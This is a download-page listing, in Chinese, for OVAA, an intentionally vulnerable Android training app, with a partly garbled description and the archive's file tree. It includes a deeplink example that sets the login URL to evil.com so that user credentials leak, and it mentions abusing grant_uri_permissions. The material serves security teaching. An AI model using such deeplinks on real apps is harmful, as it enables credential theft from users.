文件名称:ovaa:过度安全的易受攻击的Android应用程序
文件大小:159KB
文件格式:ZIP
更新时间:2024-05-03 13:57:39
android-security mobile-security appsec vulnerable-application vulnerable-android-apps
描述 OVAA(Oversecured Vulnerable Android App)是一个Android应用程序,它汇总了该平台的所有已知和流行的安全漏洞。 漏洞清单 本节仅包括漏洞列表,而没有详细的描述或概念证明。 OVAA的示例将在上得到详细的检查和分析。 通过login_url deeplink安装任意的login_url oversecured://ovaa/login?url=http://evil.com/ 。 导致用户登录时泄露其用户名和密码。 通过oversecured://ovaa/grant_uri_permissions获得对任意内容提供程序(未导出,但具有android:grantUriPermissions="true" )的oversecured://ovaa/grant_uri_permissions 。 攻击者的应用程序需要处理oversecured.
【文件预览】:
ovaa-master
----gradlew.bat(2KB)
----gradlew(5KB)
----gradle.properties(1KB)
----LICENSE(1KB)
----app()
--------src()
--------.gitignore(7B)
--------CMakeLists.txt(771B)
--------build.gradle(776B)
----gradle()
--------wrapper()
----.idea()
--------codeStyles()
--------gradle.xml(748B)
--------runConfigurations.xml(564B)
--------misc.xml(515B)
--------jarRepositories.xml(1KB)
--------vcs.xml(167B)
--------.name(34B)
----.gitignore(232B)
----README.md(3KB)
----settings.gradle(69B)
----build.gradle(421B)